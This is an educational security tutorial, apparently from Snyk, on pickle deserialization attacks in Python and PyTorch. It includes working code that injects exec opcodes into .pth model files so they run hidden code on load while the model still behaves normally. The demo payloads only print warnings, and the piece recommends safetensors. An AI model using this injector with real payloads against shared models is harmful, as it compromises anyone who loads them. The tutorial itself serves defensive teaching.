Skip to main content

Python Pickle Poisoning and Backdooring Pth Files

Written by:
0 mins read

Python's pickle module is powerful for object serialization but poses security risks, as deserializing untrusted files can execute malicious code. This is particularly relevant in machine learning workflows using shared .pth files.

We will be covering pickle examples and PyTorch examples. Let’s begin with checking your PyTorch setup.

# Check PyTorch Version, PyTorch GPU, torch cuda version
try:
	import torch
	print(f'PyTorch Version: {torch.__version__}')
	print(f'Path: {torch.__file__}')
	print(f'\nCUDA Available: {torch.cuda.is_available()}')
	if torch.cuda.is_available():
    	print(f'CUDA Version: {torch.version.cuda}')
    	print(f'Graphics Card: {torch.cuda.get_device_name(0)}')
    	print(f'# of GPUs: {torch.cuda.device_count()}')
    		for i in range(torch.cuda.device_count()):
        	print(f'\nGPU {i} Details:')
        	print(f'  Name: {torch.cuda.get_device_name(i)}')
        	print(f'  Memory: {torch.cuda.get_device_properties(i).total_memory / 1024**3:.2f} GB')
	else:
    	print('\nRunning on CPU only')
    	import multiprocessing
    	print(f'CPU Cores: {multiprocessing.cpu_count()}')
except ImportError:
	print('PyTorch is not installed. Install with: pip install torch')
except Exception as e:
	print(f'An error occurred: {str(e)}')

If you need to install PyTorch, the process can vary quite a bit depending on your setup – it is advisable to follow the instructions here

You can check the version and protocol of your pickle install like so:

$ python3 -c "import pickle; print(f'Default Protocol: {pickle.DEFAULT_PROTOCOL}\nHighest Protocol: {pickle.HIGHEST_PROTOCOL}\nAll Available Protocols: {list(range(pickle.HIGHEST_PROTOCOL + 1))}')"

The pickle module is included in Python’s standard library, so there is no need to run an installation command like pip install pickle.

What is Pickle in Python?

The pickle library is Python’s native serialization protocol. It can store complex Python objects as a sequence of “opcodes”, which are a series of executable instructions for rebuilding the serialized object. Pickle will even preserve object references and relationships between objects. 


Now, we will explore some hands-on examples of arbitrary code execution exploits in pickle.

Poisoning Python Pickles with Malicious Code

We’re going to create a pickle file and insert an instance of a class containing arbitrary code we want to execute during the deserialization of the file. Then, we will show off how an end user of this file might end up loading this pickle file, thereby engaging this vulnerability. 

import pickle
import random

# Generate random tabular data for our example
tabular_data = [
	{
    	"id": i,
    	"name": f"Item-{i}",
    	"value": random.randint(1, 100),
    	"category": random.choice(['A', 'B', 'C'])
	}
	for i in range(1, 6)
]

# Store the pickle data in a file named 'payload.pkl'
# At this stage, payload.pkl would behave as expected with no potentially malicious side effects during deserialization.
with open('payload.pkl', 'wb') as f:
	pickle.dump(tabular_data, f)

# Our class containing arbitrary code we want to execute:
class Malicious:
	def __reduce__(self):
    	# The following code will execute during deserialization
    	return (print, ("Hello World! Only load pkl files from trusted sources!",))

# Replace original data with malicious code
malicious_payload = Malicious()

# Store potentially malicious pickle data in the same file
with open('payload.pkl', 'wb') as f:
	pickle.dump([tabular_data, malicious_payload], f)

# Load the pickle file to show potentially malicious side effects
print("Loading the pickle file 'payload.pkl':")
with open('payload.pkl', 'rb') as f:
	data = pickle.load(f)

# Verify the content of the loaded data
print("\nLoaded data:")
print(data)

In our example, we just print a simple Hello World. But a malicious sample might include ransomware. 

Poisoning Pytorch Model Pth files with Malicious Code

A similar process of embedding malicious code can be applied to pth files.

import torch
import torchvision.models as models
import zipfile
import struct
from pathlib import Path

class PthCodeInjector:
	"""Minimal implementation to inject code into PyTorch pickle files. (ZIP file with data.pkl)"""

	def __init__(self, filepath: str):
    	self.filepath = Path(filepath)

	def inject_payload(self, code: str, output_path: str):
    	"""Inject Python code into the pickle file."""
    	# Read original pickle from zip
    	with zipfile.ZipFile(self.filepath, "r") as zip_ref:
        	data_pkl_path = next(name for name in zip_ref.namelist() if name.endswith("/data.pkl"))
        	pickle_data = zip_ref.open(data_pkl_path).read()

    	# Find insertion point after protocol bytes
    	i = 2  # Skip PROTO opcode and version byte

    	# Create exec sequence with protocol 4 pickle opcodes
    	exec_sequence = (
        	b'c' + b'builtins\nexec\n' +  # GLOBAL opcode + module + attr
        	b'(' +  # MARK opcode
        	b'\x8c' + struct.pack('<B', len(code)) + code.encode('utf-8') +  # SHORT_BINUNICODE
        	b't' +  # TUPLE
        	b'R'	# REDUCE
    	)

    	# Insert exec sequence after protocol bytes
    	modified_pickle = pickle_data[:i] + exec_sequence + pickle_data[i:]

    	# Write modified pickle back to zip
    	with zipfile.ZipFile(output_path, 'w') as new_zip:
        	with zipfile.ZipFile(self.filepath, 'r') as orig_zip:
            	for item in orig_zip.infolist():
                	if item.filename.endswith('/data.pkl'):
                    	new_zip.writestr(item.filename, modified_pickle)
                	else:
                    	new_zip.writestr(item.filename, orig_zip.open(item).read())

# Example and validation
if __name__ == "__main__":
	# Create and save original model
	torch.manual_seed(0)  # For reproducibility and comparing the outputs of the models
	model = models.mobilenet_v2()
	model.eval()
	torch.save(model, "mobilenet.pth")

	# Test original model
	test_input = torch.randn(1, 3, 224, 224)
	original_output = model(test_input)

	# Inject payload
	modifier = PthCodeInjector("mobilenet.pth")
	modifier.inject_payload("print('Hello world! Only load pth files from trusted sources!')", "modified.pth")

	# Load and test modified model
	modified_model = torch.load("modified.pth")  # Should print warning
	modified_model.eval()
	modified_output = modified_model(test_input)

	# Verify models are identical
	print("\nVerifying model equivalence:")
	print(f"Structure matches: {str(model) == str(modified_model)}")
	print(f"Outputs match: {torch.allclose(original_output, modified_output)}")
	print(f"Parameters match: {all(torch.equal(p1, p2) for p1, p2 in zip(model.parameters(), modified_model.parameters()))}")

This could be tackled more elegantly, with more versatility, by using fickling to inject the code directly. But, this code allows us to take a minimal look at what enables this vulnerability. In this case, the opcodes composing the pickle file are loaded, and our potentially malicious code is injected in between the existing opcodes, such that the end user loading this model would not see a difference in the functionality of the loaded model. 

Sharing model weights with Safetensors

Preferably, neural network weights would be shared in the safetensors format to begin with. We can modify our example above to demonstrate one way of exporting to this format in PyTorch.

import torch
from torch import nn
from safetensors.torch import save_file, load_file

# Example PyTorch model (a simple feed-forward neural network)
class SimpleModel(nn.Module):
	def __init__(self):
    	super(SimpleModel, self).__init__()
    	self.fc1 = nn.Linear(10, 50)
    	self.fc2 = nn.Linear(50, 2)

	def forward(self, x):
    	x = torch.relu(self.fc1(x))
    	return self.fc2(x)

# Create an instance of the model
model = SimpleModel()

# Generate some random weights (or assume it's a trained model)
example_input = torch.randn(1, 10)
output = model(example_input)  # Forward pass with random input

# Save the model's weights to Safetensors format
weights = model.state_dict()  # Get the state dictionary of the model
save_file(weights, "model.safetensors")

# Loading the model's weights from Safetensors format
loaded_weights = load_file("model.safetensors")
model.load_state_dict(loaded_weights)

# Verify loading worked by making another forward pass
output = model(example_input)
print("\nModel output after loading weights from 'model.safetensors':")
print(output)

The resulting safetensors file contains the corresponding weights, which can be paired with the architecture already defined by the code to load the model fully. But, many models, especially older models, will not have adopted this workflow. Pickle files are still widely distributed, and the pickle serialization format is still the default when saving neural networks trained in PyTorch. 

Other Exploitations of Object Deserialization

Neural network weights are not the only data stored in object serialization formats like pickle. Entire datasets are often also stored as pickle files, and in the R programming language datasets are often stored as RDS files, for example.

It is also possible to embed malicious code directly into the tensors – the model weights themselves – by encoding malicious code in such small perturbations to the weights that the impact on the model’s accuracy is minimal. This process is called tensor steganography. This can be paired with pickle deserialization exploits to produce an especially stealthy attack vector: it may appear that pickle is simply deserializing a tensor when in reality it is also reconstructing malicious code in memory for execution. This still requires exploiting the pickle format's vulnerability, though – safetensors would not reconstruct and execute the embedded malicious code in memory. 

Generative AI workflows can also include files for customization and extension of the abilities of a base model – users will often find themselves downloading LORAs, ControlNets, IPAdapter variants, or even Textual Inversion checkpoints. The same general principles discussed here also apply to these types of files – LORAs are commonly shared in the safetensors format, but for the others, it is less common. Be careful when downloading files that were serialized using pickle.

Additional Hands-on Practice

Snyk offers a CTF (Capture The Flag) event that relies on this exploit and teaches you how to exploit vulnerabilities related to Python Pickle. The Python exploit lab is called Sauerkraut, and is covered by John Hammond here.

To learn more about Python application security and vulnerabilities such as Code Injection, XPath injection, and others you’re highly encouraged to visit Snyk Learn’s Python developer security lessons.

Python_Pickle_Poisoning_and_Backdooring_Pth_Files_-_Original